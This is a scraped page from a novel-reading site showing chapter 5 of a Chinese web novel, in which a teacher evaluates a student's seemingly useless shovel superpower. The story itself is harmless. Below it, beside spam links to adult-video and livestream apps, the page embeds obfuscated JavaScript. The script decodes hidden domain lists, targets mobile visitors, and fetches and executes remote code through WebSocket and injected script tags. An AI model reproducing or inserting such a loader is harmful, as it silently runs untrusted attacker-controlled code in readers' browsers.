笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 这届学生真难教 > 第五章:老师,我想学习

第五章:老师,我想学习

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
虽然张吏早就已经回忆起孙大鹏的异能了,但是为了更直观一点,张吏还是选择用自己的眼睛去看一看。
  而且在知道自己的异能之后,张吏本身也想尝试一波。
  从魂景里面的铁锹来看,孙大鹏的异能和班级名单档案上面记载的是一样的,是一个名为【凡级武装】的废柴异能,零紫一金。
  当初,在北极光的辐射影响之后,逐渐适应超自然力量的适能者们,在最初的时候觉醒了各种各样的异能,除了一些极少数的稀有异能之外,就属两种异能人数最多了。
  一种是动物系异能,一种是武装系异能。
  动物系异能,顾名思义,就是那些可以让普通人达到兽化形态的异能,一般,都是按照觉醒动物的强弱来划分的,如果是熊狼虎豹的话自然是强一些,但要是鼠兔猴的话那相对要弱一些。
  而武装系异能的强弱,相比动物系来说落差要更大一些。
  同样都是武装系异能里面的能力,强的那是真的强,弱的那也是真的弱。
  因为动物系异能,哪怕真的是个小老鼠,觉醒后也能兽化,对身体也有一些程度上的增幅。
  但武装系异能就不一样了,你要觉醒个历朝神器出来,那你绝对是运气强大无比,而且你祖上一定有高人,但要是一般人,觉醒个榔头剪刀的,那基本上就是废武装了。
  就拿孙大鹏来举例,他的铁锹,甚至异能名字都不是铁锹,而是直接就叫【凡级武装】,同样的,剪刀、锄头、菜刀等等,也都在【凡级武装】之列。
  毕竟,你的武装要真厉害,那你就不会被称作‘凡级’了。
  “铁锹么...果然如同课本上所写,潜力极低,没有培养的可能。”
  看着他一点星光都没有的魂景,张吏也是有点难办,因为异能潜力差的缘故,这种异能修炼起来也比常人慢一些。
  自己虽然也不是什么好异能,但至少也有四颗紫星,是个当辅助的潜力股,而且因为没有自保能力,修炼起来自然相对快一点,但孙大鹏的话...
  这么一个废柴异能,再加上修炼起来奇慢无比,放在任何一个老师身上,都不好培养,哪怕是知名大学的那些高阶强者们,见到这估计也得直摇头。
  不过!
  他们是他们,我是我。
  直视着孙大鹏,张吏缓缓的开口说道。
  “孙大鹏,你是不是觉得,自己的异能是个铁锹就低人一等了?”
  对于自己的异能,那一直是孙大鹏心里的一根刺,自从觉醒之后,他甚至都不敢看铁锹了,因为每次看到那东西,心里总有一股莫名的怒火。
  而且‘铁锹’这两个字,在他心里也是一个雷区,一碰就炸的那种。
  所以听到张吏的话语之后,孙大鹏本能的一股怒火就冒了出来,但是他抬起头,看着张吏那诡异且充满压迫力的眼神时,他却不敢吱声了。
  “没,没有。”
  避开张吏的视线,孙大鹏硬着脖子道。
  “不,你有。”张吏平淡的道出了他心中所想。“我明白,看到以前的小学同学们都觉醒了强大的异能,而你则是一把铁锹,这任谁心里都会有些不舒服。”
  “但是,你觉得铁锹就一定是个废柴异能吗?”
免费看片APP    美女直播间
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6a\x58\x73\x4d\x4b\x72\x4d\x57\x79']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vc2tkamZrZGwza2wuc2hwcm91ZC5jbb20=','d3NzOOi8vd3MuZ2VuZ2Z1cXVhbi5jb206OOTE5MSx3c3M6Ly93cy5xb3Jvc21hbGwuY29tOOjkxOOTEsd3NzOOi8vd3Mud2VpeGlzaXdhbmcuY29tOOjkxOOTE=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《这届学生真难教》
打开
浏览器
继续